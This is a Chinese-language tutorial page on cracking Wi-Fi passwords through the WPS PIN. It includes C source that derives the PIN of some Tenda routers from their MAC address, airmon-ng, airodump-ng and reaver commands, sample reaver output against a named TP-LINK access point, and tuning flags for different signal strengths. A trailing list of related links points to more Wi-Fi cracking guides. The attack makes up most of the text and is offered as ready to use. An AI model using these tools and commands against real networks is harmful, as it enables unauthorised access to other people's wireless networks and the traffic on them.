wifi reaver

  PIN码的格式很简单, 八位十进制数,最后一位(第8位)为校验位(可根据前7位算出),验证时先检测前4位,如果一致则反馈一个信息,所以只需1万次就可完全扫描一遍前4位,前4位确定下来的话,只需再试1000次(接下来的3位),校验位可通过前7为算出,就可暴力验证出pin码。所以即时你不知道校验位怎么计算,那你最多尝试10000+1000+10次=11010次就可以获得PIN,从而获得wifi密码

不过使用PIN方法破解WPA-PSK密码有一个限制,就是AP必须开启了QSS、WPS功能!我们可以在扫描AP的时候判断目标AP是否开启了QSS、WPS功能,如下图使用airodump-ng扫描时候在MB栏中后面有个“.”的就是。

由于PIN是随机生成的一个8位10进制数。所以这是由各路由厂商生成的。腾达(Tenda)部分路由(C83A35,00B00C)是由MAC的前6位16进制数直接转化为7位10进制数外加一个检验码生成,算法弱爆了。所以可以直接通过Dec2Hex计算出来。  而像DLink对PIN错会有延迟,这样会导致PIN速度很慢,间接起到防PIN的作用,还有很多其他的,针对不同的路由可以去网上找相关资料。而有一些TPLink是直接带有防PIN功能的。当然这都是需要时间的,所以要有耐心。

“C83A35”或“00B00C”打头路由PIN计算工具源码,大家可以自己编译:

    //Computes PIN code starts with OUI "C83A35" and "00B00C"

    //Both two OUIs which belonged to Tenda Technology Co., Ltd are confirmed effectively.
    //Coded by Zhaochunsheng - iBeini.com
    //Modified by Lingxi - WiFiBETA.COM

    #include <stdio.h>
    #include <stdlib.h>
    #include <stdafx.h>

    int main()
    {

        unsigned int wps_pin_checksum(unsigned int pin);
        int PIN = 0;

     //   printf("ComputePIN-C83A35\n");
        printf("Description:\n");
        printf("If your wireless router MAC address start with \"C83A35\" or \"00B00C\",\n");
        printf("type the other six digits, you might be able to get the \n");
        printf("WPS-PIN of this equipment, please have a try, good luck!\n\n");
        printf("Code by ZhaoChunsheng 04/07/2012 http://www.2cto.com \n\n");

        printf("Modified by Lingxi - WiFiBETA.COM\n\n");
    //Translated to Chinese
     printf("说明:\n");
     printf("如果您的无线路由器MAC地址以“C83A35”或“00B00C”打头,\n");
     printf("输入后六位MAC地址(不分大小写)您或许可以获得该路由的WPS PIN密钥!\n");
     printf("祝你好运!\n\n");
     printf("由赵春生编写于2012年4月7日  Http://iBeini.com\n");
     printf("由灵曦修改并汉化  WiFiBETA.COM\n\n");
     printf("请输入后六位MAC地址(HEX):\n");
     printf("Input the last 6 digits of MAC Address(HEX):");
     scanf("%x",&PIN);  printf("Last 6 digits of MAC Address(HEX) are: %X\n",PIN);
     printf("WPS PIN is: %07d%d\n",PIN%10000000,wps_pin_checksum(PIN%10000000));

        return 0;
    }

    unsigned int wps_pin_checksum(unsigned int pin)
    {
    unsigned int accum = 0;
    while (pin)
    {
    accum += 3 * (pin % 10);
    pin /= 10;
    accum += pin % 10;
    pin /= 10;
    }

        return (10 - accum % 10) % 10;
    }

在已知PIN码的情况下,使用 直接秒破

reaver -i mon0 -b   Mac  -p pin

使用 aircrack,寻找附近开启wps的路由器

airmon-ng start wlan0
airodump-ng mon0
   
 

使用reaver 破解开启wps功能的路由器密码

reaver在此过程中还会保存进度(/usr/local/etc/reaver/APs MAC.wpc)到文件。

reaver -i mon0 -b MAC  -N -vv
reaver  -i  mon0  -b 8C:21:0A:5F:A2:FA  -a  -S  -vv  -d2  -t 5 -c 1
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner &lt;[email protected]&gt;
[+] Switching mon0 to channel 1
[+] Waiting for beacon from 8C:21:0A:5F:A2:FA
[+] Associated with 8C:21:0A:5F:A2:FA (ESSID: TP-LINK_5FA2FA)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
 

附上reaver调整参数的一些小技巧

reaver:

-i 监听后接口名称
-b 目标mac地址
-a 自动检测目标AP最佳配置
-S 使用最小的DH key(可以提高PJ速度)
-vv 显示更多的非严重警告
-d 即delay每穷举一次的闲置时间 预设为1秒
-t 即timeout每次穷举等待反馈的最长时间
-c指定频道可以方便找到信号,如-c1 指定1频道,大家查看自己的目标频道做相应修改 
 
 
(非TP-LINK路由推荐–d9 –t9参数防止路由僵死
    reaver -i mon0 -b MAC -a -S –d9 –t9 -vv)
应因状况调整参数(-c后面都以目标频道为1作为例子)
目标信号非常好: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1
目标信号普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t 5 -c 1
目标信号一般: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1

.

时间: 2024-11-03 03:44:40

wifi reaver的相关文章

真正的手机破解wifi密码,aircrack-ng,reaver,仅限mx2(BCM4330芯片)

仅限mx2(BCM4330芯片),mx可能有戏没测试(BCM4329?),mx3不行. PS:原生安卓应用,非虚拟机 reaver,不知道是啥的看这里http://tieba.baidu.com/p/2682878857 抓包破解wifi密码 下载地址: http://pan.baidu.com/s/19qQ3M 依次安装4个包,注意BusyBox安装完成之后需要打开再点一次安装,安装完四个包之后重启手机 打开bcmon,点安装,然后点启动监听模式,按home返回桌面,打开AircrackGUI

树莓派(RASPBERRYPI)安装AIRCRACK-NG,REAVER及WIFI破解教程[整理]

原文链接:http://www.findspace.name/res/1184 转载请注明 硬件环境 树莓派B+一个(我用的是debian环境) PC一台(或其它设备直接操作PI就行) 无线网卡(能用就行,不过强大的无线网卡会事半功倍,我用的3070) Find注: 无线网卡不是哪个都行,需要支持监听模式才可以,支持列表可以查看这里: https://wikidevi.com/wiki/Wireless_adapters/Chipset_table 安装依赖包 sudo apt-get inst

一些Wifi破解姿势

wlan0:无线网卡设备 BSSID/AP's MAC:目标路由器的mac地址 Client's MAC:连接到此wifi客户端的mac地址 ESSID:这个无线的名字 CH[X] 扫描的信道号,因为airodump是跳频扫描的,会一直扫描13个信道.后面是你的扫描时间和你本地时间. BSSID:路由器MAC地址 PWR:网卡的信号水平,新号越好数值越大,但是例如第一个出现‘-1’说明该客户端不在我的监听范围内. Beacons:就是Beacon数据的速率 #Date:被捕获的数据分组数量 #/

WIFI 破解(初级)

话不多说,先来看看字典破解 wpa2 的效果 =================================== ===============================================字典破解 wifi-wpa/wpa2目前最常用的加密类型此方法只适合破解弱口令其他暴力破解伤CPU/GPU===============================================1. 安装aircrack-ng   1. 直接使用apt-get,但有的软件仓库不是最

CDLinux环境下WiFi密码破解

> 准备好所需软件以及上篇教程中使用Fbinstool制作的可启动U盘 2 > 解压CDLinux-0.9-spring-0412.iso到U盘的根目录  如图 3 > 打开fbinstool编辑menu.lst  如下 timeout 10 default 0 gfxmenu (ud)/message || find --set-root /message && gfxmenu /message configfile (md)4+8 title  启动 CDLinux

无线wifi-PJ-之在开启WPS下使用reaver

PJ简单解释: PIN码分前4和后4,先破前4只有最多一万个组合,破后4中的前3只有一千个组 合,一共就是一万一千个密码组合. 10的4次方+10的3次方=11000个密码组合. 当reaver确定前4位PIN密码后,其任务进度数值将直接跳跃至90.9%以上,也就是 说只剩余一千个密码组合了.总共一万一千个密码! ----------------------------------------------------------- 学习过程 1.在虚拟机找到点击打开.如果电脑装有多个无线网卡,请

利用kali破解wifi密码

准备工具 1.笔记本 2.USB无线上网卡(必备) 3.kali系统 4.密码字典 第一种方法 暴力破解法 何为暴力破解呢,其实就是一个一个密码去试,直到正确的密码. 现在的wifi一般加密都是: 1. WEP(有线等效加密)——采用WEP64位或者128位数据加密. 2.WPA-PSK[TKIP]———采用预共享秘钥的WI-FI保护访问,采用WPA-PSK标准加密技术,加密类型为TKIP. 3.WPA-PSK[TKIP]+WPA2-PSK[AES]———允许客户端使用WPA-PSK[TKIP]

转 15款免费WiFi(入侵破解)安全测试工具

转:http://www.ctocio.com/security/cloudsecurity/6594.html 一.Vistumbler扫描器 WiFi 扫描器能能发现附近AP的详细信息,例如信号强度.安全模式和MAC地址等.而WiFi嗅探器则能捕获无线网络的原始数据包,并将这些包导入其他工具例如解密工具.Vistumbler属于WiFi扫描器,是一个开源的Windows程序,可以显示基本的AP信息,如实际的认证和加密方式,甚至能读出SSID和RSSI.还能图形化显示信号强度.Vistumbl

Kali Linux中前十名的Wifi攻击工具

无 线网络的攻与防一直是比较热门的话题,由于无线信号可以被一定范围内的任何人接收到(包括死黑阔),这样就给WIFI带来了安全隐患:路由器生产厂商和网 络服务供应商(ISPs)的配置大多是默认开启了WPS,这种环境下,无线网络往往是安全渗透测试里边的重要突破口.而使用以下这10个Wifi攻击工 具,我们就可以测试自己的无线网络潜在的安全问题了. 1. Aircrack-ng Aircrack是破解WEP/WPA/WPA2加密的主流工具之一,Aircrack-ng套件包含的工具可用于捕获数据包.握手